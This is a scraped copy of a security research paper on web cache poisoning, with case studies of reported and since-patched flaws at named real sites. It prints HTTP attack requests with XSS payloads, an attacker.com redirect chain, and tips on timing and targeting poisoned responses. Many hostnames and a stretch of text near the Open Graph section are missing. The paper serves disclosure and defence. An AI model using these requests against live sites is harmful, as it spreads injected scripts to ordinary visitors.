Practical Web Cache Poisoning

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Practical Web Cache Poisoning

#Practical Web Cache Poisoning | 来源: 网络整理| 查看: 265

Practical Web Cache Poisoning James Kettle James Kettle

Director of Research


Published: 09 August 2018 at 23:20 UTC

Updated: 12 January 2021 at 13:20 UTC


Web cache poisoning has long been an elusive vulnerability, a 'theoretical' threat used mostly to scare developers into obediently patching issues that nobody could actually exploit.

In this paper I'll show you how to compromise websites by using esoteric web features to turn their caches into exploit delivery systems, targeting everyone that makes the mistake of visiting their homepage.

I'll illustrate and develop this technique with vulnerabilities that handed me control over numerous popular websites and frameworks, progressing from simple single-request attacks to intricate exploit chains that hijack JavaScript, pivot across cache layers, subvert social media and misdirect cloud services. I'll wrap up by discussing defense against cache poisoning, and releasing the open source Burp Suite Community extension that fueled this research.

You can also watch my presentation on this research, or peruse it as a printable whitepaper.

Core ConceptsCaching 101

To grasp cache poisoning, we'll need to take a quick look at the fundamentals of caching. Web caches sit between the user and the application server, where they save and serve copies of certain responses. In the diagram below, we can see three users fetching the same resource one after the other:

Caching is intended to speed up page loads by reducing latency, and also reduce load on the application server. Some companies host their own cache using software like Varnish, and others opt to rely on a Content Delivery Network (CDN) like Cloudflare, with caches scattered across geographical locations. Also, some popular web applications and frameworks like Drupal have a built-in cache.

There are also other types of cache, such as client-side browser caches and DNS caches, but they're not the focus of this research.

Cache keys

The concept of caching might sound clean and simple, but it hides some risky assumptions. Whenever a cache receives a request for a resource, it needs to decide whether it has a copy of this exact resource already saved and can reply with that, or if it needs to forward the request to the application server.

Identifying whether two requests are trying to load the same resource can be tricky; requiring that the requests match byte-for-byte is utterly ineffective, as HTTP requests are full of inconsequential data, such as the requester's browser:

GET /blog/post.php?mobile=1 HTTP/1.1Host: example.comUser-Agent: Mozilla/5.0 … Firefox/57.0Accept: */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: jessionid=xyz;Connection: close

Caches tackle this problem using the concept of cache keys – a few specific components of a HTTP request that are taken to fully identify the resource being requested. In the request above, I've highlighted the values included in a typical cache key in orange.

This means that caches think the following two requests are equivalent, and will happily respond to the second request with a response cached from the first:

GET /blog/post.php?mobile=1 HTTP/1.1Host: example.comUser-Agent: Mozilla/5.0 … Firefox/57.0Cookie: language=pl;Connection: closeGET /blog/post.php?mobile=1 HTTP/1.1Host: example.comUser-Agent: Mozilla/5.0 … Firefox/57.0Cookie: language=en;Connection: close

As a result, the page will be served in the wrong language to the second visitor. This hints at the problem – any difference in the response triggered by an unkeyed input may be stored and served to other users. In theory, sites can use the 'Vary' response header to specify additional request headers that should be keyed. in practice, the Vary header is only used in a rudimentary way, CDNs like Cloudflare ignore it outright, and people don't even realise their application supports any header-based input.

This causes a healthy number of accidental breakages, but the fun really starts when someone intentionally sets out to exploit it.

Cache Poisoning

The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users.

In this paper, we're going to poison caches using unkeyed inputs like HTTP headers. This isn't the only way of poisoning caches - you can also use HTTP Response Splitting and Request Smuggling - but it is the most reliable. Please note that web caches also enable a different type of attack called Web Cache Deception which should not be confused with cache poisoning.


We'll use the following methodology to find cache poisoning vulnerabilities:

Rather than attempt to explain this in depth upfront, I'll give a quick overview then demonstrate it being applied to real websites.

The first step is to identify unkeyed inputs. Doing this manually is tedious so I've developed an open source Burp Suite extension called Param Miner that automates this step by guessing header/cookie names, and observing whether they have an effect on the application's response.

After finding an unkeyed input, the next steps are to assess how much damage you can do with it, then try and get it stored in the cache. If that fails, you'll need to gain a better understanding of how the cache works and hunt down a cacheable target page before retrying. Whether a page gets cached may be based on a variety of factors including the file extension, content-type, route, status code, and response headers.

Cached responses can mask unkeyed inputs, so if you're trying to manually detect or explore unkeyed inputs, a cache-buster is crucial. If you have Param Miner loaded, you can ensure every request has a unique cache key by adding a parameter with a value of $randomplz to the query string.

When auditing a live website, accidentally poisoning other visitors is a perpetual hazard. Param Miner mitigates this by adding a cache buster to all outbound requests from Burp. This cache buster has a fixed value so you can observe caching behaviour yourself without it affecting other users.

Case Studies

Let's take a look at what happens when the methodology is applied to real websites. As usual, I've exclusively targeted sites with researcher-friendly security policies. These case studies were found using the research pipeline documented in Cracking the Lens: Targeting HTTP's hidden attack-surface. All the vulnerabilities discussed here have been reported and patched, although due to 'private' programs I've been forced to redact a few.

The response from my targets was mixed; Unity patched everything swiftly and rewarded well, Mozilla at least patched quickly, and others including and Ghost did nothing for months and only patched due to the threat of imminent publication.

Many of these case studies exploit secondary vulnerabilities such as XSS in the unkeyed input, and it's important to remember that without cache poisoning, such vulnerabilities are useless as there's no reliable way to force another user to send a custom header on a cross-domain request. That's probably why they were so easy to find.

Basic Poisoning

In spite of its fearsome reputation, cache poisoning is often very easy to exploit. To get started, let's take a look at Red Hat's homepage. Param Miner immediately spotted an unkeyed input:

GET /en?cb=1 HTTP/1.1Host: www.redhat.comX-Forwarded-Host: canary

HTTP/1.1 200 OKCache-Control: public, no-cache…

Here we can see that the X-Forwarded-Host header has been used by the application to generate an Open Graph URL inside a meta tag. The next step is to explore whether it's exploitable – we'll start with a simple cross-site scripting payload:

GET /en?dontpoisoneveryone=1 HTTP/1.1Host: www.redhat.comX-Forwarded-Host: a.">alert(1)

HTTP/1.1 200 OKCache-Control: public, no-cache…alert(1)"/>

Looks good – we've just confirmed that we can cause a response that will execute arbitrary JavaScript against whoever views it. The final step is to check if this response has been stored in a cache so that it'll be delivered to other users. Don't let the 'Cache Control: no-cache' header dissuade you – it's always better to attempt an attack than assume it won't work. You can verify first by resending the request without the malicious header, and then by fetching the URL directly in a browser on a different machine:

GET /en?dontpoisoneveryone=1 HTTP/1.1Host:

HTTP/1.1 200 OK…alert(1)"/>

That was easy. Although the response doesn't have any headers that suggest a cache is present, our exploit has clearly been cached. A quick DNS lookup offers an explanation – is a CNAME to, indicating that it's using Akamai's CDN.

Discreet poisoning

At this point we've proven the attack is possible by poisoning to avoid affecting the site's actual visitors. In order to actually poison the blog's homepage and deliver our exploit to all subsequent visitors, we'd need to ensure we sent the first request to the homepage after the cached response expired.

This could be attempted using a tool like Burp Intruder or a custom script to send a large number of requests, but such a traffic-heavy approach is hardly subtle. An attacker could potentially avoid this problem by reverse engineering the target's cache expiry system and predicting exact expiry times by perusing documentation and monitoring the site over time, but that sounds distinctly like hard work.

Luckily, many websites make our life easier. Take this cache poisoning vulnerability in

GET / HTTP/1.1Host: unity3d.comX-Host:

HTTP/1.1 200 OKVia: 1.1 varnish-v4Age: 174Cache-Control: public, max-age=1800…

We have an unkeyed input - the X-Host header – being used to generate a script import. The response headers 'Age' and 'max-age' respectively specify the age of the current response, and the age at which it will expire. Taken together, these tell us the precise second we should send our payload to ensure our response gets cached.

Selective Poisoning

HTTP headers can provide other time-saving insights into the inner workings of caches. Take the following well-known website, which is using Fastly and sadly can't be named:

GET / HTTP/1.1Host: redacted.comUser-Agent: Mozilla/5.0 … Firefox/60.0X-Forwarded-Host: a">

HTTP/1.1 200 OKX-Served-By: cache-lhr6335-LHRVary: User-Agent, Accept-Encoding…a

This initially looks almost identical to the first example. However, the Vary header tells us that our User-Agent may be part of the cache key, and manual testing confirms this. This means that because we've claimed to be using Firefox 60, our exploit will only be served to other Firefox 60 users. We could use a list of popular user agents to ensure most visitors receive our exploit, but this behaviour has given us the option of more selective attacks. Provided you knew their user agent, you could potentially tailor the attack to target a specific person, or even conceal itself from the website monitoring team.

DOM Poisoning

Exploiting an unkeyed input isn't always as easy as pasting an XSS payload. Take the following request:

GET /dataset HTTP/1.1Host: canary

HTTP/1.1 200 OKAge: 32707X-Cache: Hit from cloudfront …

We've got control of the 'data-site-root' attribute, but we can't break out to get XSS and it's not clear what this attribute is even used for. To find out, I created a match and replace rule in Burp to add an 'X-Forwarded-Host:' header to all requests, then browsed the site. When certain pages loaded, Firefox sent a JavaScript-generated request to my server:

GET /api/i18n/en HTTP/1.1Host:

The path suggests that somewhere on the website, there's JavaScript code using the data-site-root attribute to decide where to load some internationalisation data from. I attempted to find out what this data ought to look like by fetching, but merely received an empty JSON response. Fortunately, changing 'en' to 'es' gave a clue:

GET /api/i18n/es HTTP/1.1Host:

HTTP/1.1 200 OK…{"Show more":"Mostrar más"}

The file contains a map for translating phrases into the user's selected language. By creating our own translation file and using cache poisoning to point users toward that, we could translate phrases into exploits:

GET  /api/i18n/en HTTP/1.1Host:

HTTP/1.1 200 OK...{"Show more":""}

The end result? Anyone who viewed a page containing the text 'Show more' would get exploited.

Hijacking Mozilla SHIELD

The 'X-Forwarded-Host' match/replace rule I configured to help with the last vulnerability had an unexpected side effect. In addition to the interactions from, I received some that were distinctly mysterious:

GET /api/v1/recipe/signed/ HTTP/1.1Host: xyz.burpcollaborator.netUser-Agent: Mozilla/5.0 … Firefox/57.0Accept: application/jsonorigin: nullX-Forwarded-Host:

I had previously encountered the 'null' origin in my CORS vulnerability research, but I'd never seen a browser issue a fully lowercase Origin header before. Sifting through proxy history logs revealed that the culprit was Firefox itself. Firefox had tried to fetch a list of 'recipes' as part of its SHIELD system for silently installing extensions for marketing and research purposes. This system is probably best known for forcibly distributing a 'Mr Robot' extension, causing considerable consumer backlash.

Anyway, it looked like the X-Forwarded-Host header had fooled this system into directing Firefox to my own website in order to fetch recipes:

GET /api/v1/ HTTP/1.1Host: normandy.cdn.mozilla.netX-Forwarded-Host:

HTTP/1.1 200 OK{  "action-list": "",  "action-signed": "",  "recipe-list": "",  "recipe-signed": "",  …}

Recipes look something like:

[{  "id": 403,  "last_updated": "2017-12-15T02:05:13.006390Z",  "name": "Looking Glass (take 2)",  "action": "opt-out-study",  "addonUrl": "",  "filter_expression": " in  ['US', 'CA']\n && normandy.version >= '57.0'\n)",  "description": "MY REALITY IS JUST DIFFERENT THAN YOURS",}]

This system was using NGINX for caching, which was naturally happy to save my poisoned response and serve it to other users. Firefox fetches this URL shortly after the browser is opened and also periodically refetches it, ultimately meaning all of Firefox's tens of millions of daily users could end up retrieving recipes from my website.

This offered quite a few possibilities. The recipes used by Firefox were signed so I couldn't just install a malicious addon and get full code execution, but I could direct tens of millions of genuine users to a URL of my choice. Aside from the obvious DDoS usage, this would be extremely serious if combined with an appropriate memory corruption vulnerability. Also, some backend Mozilla systems use unsigned recipes, which could potentially be used to obtain a foothold deep inside their infrastructure and perhaps obtain the recipe-signing key. Furthermore, I could replay old recipes of my choice which could potentially force mass installation of an old known-vulnerable extension, or the unexpected return of Mr Robot.

I reported this to Mozilla and they patched their infrastructure in under 24 hours but there was some disagreement about the severity so it was only rewarded with a $1,000 bounty.

Route poisoning

Some applications go beyond foolishly using headers to generate URLs, and foolishly use them for internal request routing:

GET / HTTP/1.1Host: www.goodhire.comX-Forwarded-Server: canary

HTTP/1.1 404 Not FoundCF-Cache-Status: MISS…HubSpot - Page not found

The domain canary does not exist in our system. is evidently hosted on HubSpot, and HubSpot is giving the X-Forwarded-Server header priority over the Host header and getting confused about which client this request is intended for. Although our input is reflected in the page, it's HTML encoded so a straightforward XSS attack doesn't work here. To exploit this, we need to go to, register ourselves as a HubSpot client, place a payload on our HubSpot page, and then finally trick HubSpot into serving this response on

GET / HTTP/1.1Host: www.goodhire.comX-Forwarded-Host:

HTTP/1.1 200 OK…alert(document.domain)

Cloudflare happily cached this response and served it to subsequent visitors.

Inflection passed this report on to HubSpot, who appeared to try and resolve the issue by permanently banning my IP address. A while later, the vulnerability was patched. After the publication of this post, HubSpot reached out to state that they never received the report from Inflection (so both the IP ban and patch were standard defence and hardening measures) and that I'd have had a better experience if I had contacted their own disclosure program directly. If nothing else, this serves to highlight the hazards of reporting vulnerabilities via third parties.

Internal misrouting vulnerabilities like this are on particularly common on SaaS applications where there's a single system handling requests intended for many different customers.

Hidden Route Poisoning

Route poisoning vulnerabilities aren't always quite so obvious:

GET / HTTP/1.1Host: blog.cloudflare.comX-Forwarded-Host: canary

HTTP/1.1 302 FoundLocation:

Cloudflare's blog is hosted by Ghost, who are clearly doing something with the X-Forwarded-Host header. You can avoid the 'fail' redirect by specifying another recognized hostname like, but this simply results in a mysterious 10 second delay followed by the standard response. At first glance there's no clear way to exploit this.

When a user first registers a blog with Ghost, it issues them with a unique subdomain under Once a blog is up and running, the user can define an arbitrary custom domain like If a user has defined a custom domain, their subdomain will simply redirect to it:

GET / HTTP/1.1Host:

HTTP/1.1 302 FoundLocation:

Crucially, this redirect can also be triggered using the X-Forwarded-Host header:

GET / HTTP/1.1Host: blog.cloudflare.comX-Forwarded-Host:

HTTP/1.1 302 FoundLocation:

By registering my own account and setting up a custom domain, I could redirect requests sent to to my own site: This meant I could hijack resource loads like images:

The next logical step of redirecting a JavaScript load to gain full control over was thwarted by a quirk – if you look closely at the redirect, you'll see it uses HTTP whereas the blog is loaded over HTTPS. This means that browsers' mixed-content protections kick in and block script/stylesheet redirections.

I couldn't find any technical way to make Ghost issue a HTTPS redirect, and was tempted to abandon my scruples and report the use of HTTP rather than HTTPS to Ghost as a vulnerability in the hope that they'd fix it for me. Eventually I decided to crowdsource a solution by making a replica of the problem and placing it in hackxor with a cash prize attached. The first solution was found by Sajjad Hashemian, who spotted that in Safari if was in the browser's HSTS cache the redirect would be automatically upgraded to HTTPS rather than being blocked. Sam Thomas followed up with a solution for Edge, based on work by Manuel Caballero – issuing a 302 redirect to a HTTPS URL completely bypasses Edge's mixed-content protection.

In total, against Safari and Edge users I could completely compromise every page on,, and every other client. Against Chrome/Firefox users, I could merely hijack images. Although I used Cloudflare for the screenshot above, as this was an issue in a third party system I choose to report it via Binary because their bug bounty program pays cash, unlike Cloudflare's.

Chaining Unkeyed Inputs

Sometimes an unkeyed input will only confuse part of the application stack, and you'll need to chain in other unkeyed inputs to achieve an exploitable result. Take the following site:

GET /en HTTP/1.1Host: redacted.netX-Forwarded-Host: xyz

HTTP/1.1 200 OKSet-Cookie: locale=en; domain=xyz

The X-Forwarded-Host header overrides the domain on the cookie, but none of the URLs generated in the rest of the response. By itself this is useless. However, there's another unkeyed input:

GET /en HTTP/1.1Host: redacted.netX-Forwarded-Scheme: nothttps

HTTP/1.1 301 Moved PermanentlyLocation:

This input is also useless by itself, but if we combine the two together we can convert the response into a redirect to an arbitrary domain:

GET /en HTTP/1.1Host: redacted.netX-Forwarded-Host: attacker.comX-Forwarded-Scheme: nothttps

HTTP/1.1 301 Moved PermanentlyLocation:

Using this technique it was possible to steal CSRF tokens from a custom HTTP header by redirecting a POST request. I could also obtain stored DOM-based XSS with a malicious response to a JSON load, similar to the exploit mentioned earlier.

Open Graph Hijacking

On another site, the unkeyed input exclusively affected Open Graph URLs:

GET /en HTTP/1.1Host: redacted.netX-Forwarded-Host:

HTTP/1.1 200 OKCache-Control: max-age=0, private, must-revalidate…

Open Graph is a protocol created by Facebook to let website owners dictate what happens when their content is shared on social media. The og:url parameter we've hijacked here effectively overrides the URL that gets shared, so anyone who shares the poisoned page actually ends up sharing content of our choice.

As you may have noticed, the application sets 'Cache-Control: private', and Cloudflare refuse to cache such responses. Fortunately, other pages on the site explicitly enable caching:

GET /popularPage HTTP/1.1Host: redacted.netX-Forwarded-Host:

HTTP/1.1 200 OKCache-Control: public, max-age=14400Set-Cookie: session_id=942…CF-Cache-Status: MISS

The 'CF-Cache-Status' header here is an indicator that Cloudflare is considering caching this response, but in spite of this the response was never actually cached. I speculated that Cloudflare's refusal to cache this might be related to the session_id cookie, and retried with that cookie present:

GET /popularPage HTTP/1.1Host: redacted.netCookie: session_id=942…;X-Forwarded-Host:

HTTP/1.1 200 OKCache-Control: public, max-age=14400CF-Cache-Status: HIT…Options>Remove unsupported encodings' option rewrites this header.

Both of these scenarios can be easily resolved by tweaking the poison request to ensure the cache keys match.


The most robust defense against cache poisoning is to disable caching. This is plainly unrealistic advice for some, but I suspect that quite a few websites start using a service like Cloudflare for DDoS protection or easy SSL, and end up vulnerable to cache poisoning simply because caching is enabled by default.

Restricting caching to purely static responses is also effective, provided you're sufficiently wary about what you define as 'static'.

Likewise, avoiding taking input from headers and cookies is an effective way to prevent cache poisoning, but it's hard to know if other layers and frameworks are sneaking in support for extra headers. As such I recommend auditing every page of your application with Param Miner to flush out unkeyed inputs.

Once you've identified unkeyed inputs in your application, the ideal solution is to outright disable them. Failing that, you could strip the inputs at the cache layer, or add them to the cache key. Some caches let you use the Vary header to key unkeyed inputs, and others let you define custom cache keys but may restrict this feature to 'enterprise' customers.

Finally, regardless of whether your application has a cache, some of your clients may have a cache at their end and as such client-side vulnerabilities like XSS in HTTP headers should never be ignored.


Web cache poisoning is far from a theoretical vulnerability, and bloated applications and towering server stacks are conspiring to take it to the masses. We've seen that even well-known frameworks can hide dangerous omnipresent features, confirming it's never safe to assume that someone else has read the source code just because it's open-source and has millions of users. We've also seen how placing a cache in front of a website can take it from completely secure to critically vulnerable. I think this is part of a greater trend where as websites become increasingly nestled inside helper systems, their security posture is increasingly difficult to adequately assess in isolation.

Finally, I've built a little challenge for people to test their knowledge, and look forward to seeing where other researchers take web cache poisoning in future.

2020 update

You can find further research on this topic in my followup posts Bypassing Web Cache Poisoning Countermeasures and Web Cache Entanglement: Novel Pathways to Poisoning.

Also, we have released a collection of free, interactive labs so you can try out web cache poisoning for yourself as part of our Web Security Academy:


Web cache poisoning labs

web cache poisoning James Favourites

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